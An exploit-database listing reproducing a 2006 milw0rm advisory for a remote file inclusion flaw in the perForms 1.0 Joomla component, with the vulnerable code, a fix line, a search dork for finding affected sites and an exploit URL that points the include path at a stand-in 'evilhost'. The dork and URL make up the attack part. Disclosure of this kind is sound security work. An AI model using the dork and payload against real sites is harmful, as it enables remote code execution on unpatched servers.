perForms - exploit.company

vendor:

perForms

by:

milw0rm.com

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: perForms

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

perForms Joomla Component version 1.0 is vulnerable to Remote File Inclusion due to the variable $mosConfig_absolute_path not being sanitized. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to the victim. The URL will contain the malicious code which will be executed on the vulnerable system. The fix for this vulnerability is to add the code 'defined('_VALID_MOS') or die('Direct access to this location is not allowed.');' before the vulnerable code.

Mitigation:

Add the code 'defined('_VALID_MOS') or die('Direct access to this location is not allowed.');' before the vulnerable code.

Source

Exploit-DB raw data:

------------------------------------------------------------------------ ---
perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
------------------------------------------------------------------------ ---

Remote : Yes
Critical Level : High
Vuln founded in a log file: lazy 0day!!! :D
Description:
~~~~~~~~~~~~
Application : perForms Joomla Component
Version : latest version [1.0]
URL : http://forge.joomla.org/sf/projects/performs
Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on in /components/com_performs/com_performs/performs.php on lines 6-10

require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _template.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _valid.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _phpForm.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myL ib.php" );
require_once($mosConfig_absolute_path."/administrator/components/com_per forms/class.performs.php");

Exploit:
~~~~~~~~
dork: inurl:"com_performs" -> founds ~12.000 sites (!)

http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost

Fix
~~~~
Add before code:

defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

Thx

~~~~
Who works for better code and better life!
------------------------------------------------------------------------

# milw0rm.com [2006-07-17]